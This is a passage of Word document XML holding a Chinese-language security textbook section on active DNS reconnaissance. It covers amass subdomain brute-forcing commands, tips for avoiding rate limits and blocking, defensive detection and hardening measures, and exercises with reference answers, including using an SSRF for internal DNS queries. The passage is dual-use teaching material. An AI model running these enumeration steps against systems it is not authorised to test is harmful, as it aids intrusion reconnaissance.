        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定一个自定义的递归解析器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，用于避免直接冲击目标的权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS，降低被立即封禁的风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">amass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：与单纯依赖字典爆破的工具不同，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Amass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这类工具混合了被动和主动技术。它首先从证书透明度日志、搜索引擎等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源收集子域，然后通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询进行验证，最后再进行可选的字典爆破。其主动枚举指令集可以下命令启动：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">amass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> enum </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -active </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-brute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH_TO_WORDLIST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-active</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用主动的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-brute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用字典爆破功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这类工具将输出解析到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址的子域列表。其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出来自于纯粹的字典命中，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">amass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出则可能包含一部分源于证书透明度日志或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">委派关系的子域，这些是字典之外的发现②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错与注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">速率限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果工具运行一段时间后停止返回任何结果，可能是触发了目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的速率限制。解决方案是降低并发线程数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数）或增加请求延迟。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">通配符干扰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果所有爆破出的子域都指向同一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，说明目标很可能配置了通配符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析。需要利用工具的高级选项或手动筛选来找出少数不指向通配符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的真正独特子域，这些往往是更有价值的目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：抵御子域爆破攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">查询分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控来自少数几个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的、包含大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NXDOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询流量。这是子域爆破在流量层面最显著的“签名”。一个正常用户不可能在短时间内产生如此多对不存在域名的查询。通过计算一段时间窗口内，单个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">产生的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NXDOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询数与总查询数的比例，可以高效地设定告警阈值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">查询熵值分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：正常域名的查询往往遵循齐夫分布（Zipf’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">law），即少数热门域名贡献了大部分流量。而字典爆破产生的查询序列，其域名分布呈高熵值的均匀或随机特征。利用机器学习模型或简单的统计方法分析查询名称的信息熵，是发现隐蔽扫描的有效手段，正如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bilbo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模型将此类技术用于侦测恶意域名生成算法（DGA）的思路一样，防御者同样可以将此法反向应用于检测扫描行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使用通配符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：正如前文所述，为域名配置一条通配符记录，将所有未明确定义的主机名解析到一个无害的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP（或一个蜜罐系统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP）。这会极大增加攻击者自动化工具区分真实子域和虚假子域的难度和误判率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙与响应速率限制（RRL）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙（Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Policy Zones, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RPZ）可以根据域名或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特征对查询进行阻断或重定向。同时，DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器软件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BIND）普遍支持的响应速率限制功能，可以限制对同源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的相同查询（尤其是产生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NXDOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的查询）的响应速率，既降低了服务器负载，也大幅减缓了攻击者的扫描进度。</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4.2：主动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察风险评估与技能迁移</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">场景分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在一次授权的安全评估中，你发现目标存在一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞，允许你从目标内网的一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发起任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询。然而，目标外网的权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器正确配置并禁用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AXFR。请问你是否还有必要利用这个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞在内网进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询？请至少列举两种可能的价值。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：思考内外网的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视图是否一致。内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否可能解析出外部不可见的内部管理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参考解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：有必要。第一，企业常采用拆分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构，内网</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能包含外网不可见的、指向管理接口或数据库服务器的内部主机名解析；第二，内网主机名命名方式可能符合可预测的模式，为后续在主机层面进行暴力破解提供灵感。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术对比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从防御者的日志视角看，一个使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig @&lt;NS_SERVER&gt; &lt;DOMAIN&gt; AXFR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的尝试，和一个使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dns...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的子域爆破活动，各自会在日志中留下什么最核心的特征？哪个更容易被检测到？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：思考查询的协议（TCP/UDP）、查询类型（AXFR/A）和查询行为的表象。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参考解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig AXFR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
